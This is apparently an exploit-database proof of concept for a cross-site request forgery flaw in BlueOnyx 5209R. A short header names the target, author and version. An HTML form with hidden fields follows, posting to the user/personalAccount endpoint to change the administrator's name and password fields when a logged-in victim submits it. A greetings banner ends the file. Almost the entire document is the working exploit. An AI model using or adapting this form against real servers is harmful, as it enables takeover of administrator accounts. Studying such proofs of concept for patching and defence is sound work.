<!--
# Exploit Title: BlueOnyx 5209R (Change Password) CSRF Exploita
# Exploit Author: bck_mohajem
# Vendor Homepage: http://www.blueonyx.it
# Version: 5209R
# Tested on: Ubuntu
#PoC :
-->
<form method="post" action="http://127.0.0.1:444/user/personalAccount">
<input type="hidden" SIZE="20" name="fullNameField" value="adminstrator">
<input type="hidden" name="languageField" value="en_US">
<input type="hidden" name="newPasswordField" value="">
<input type="hidden" name="_newPasswordField_repeat" value="">
<input type="submit" value="submit">
</form>
######################################################
#
#tanks: Dr Ms Jk - n1arash - Milad Hacking - malah_sky
############################################################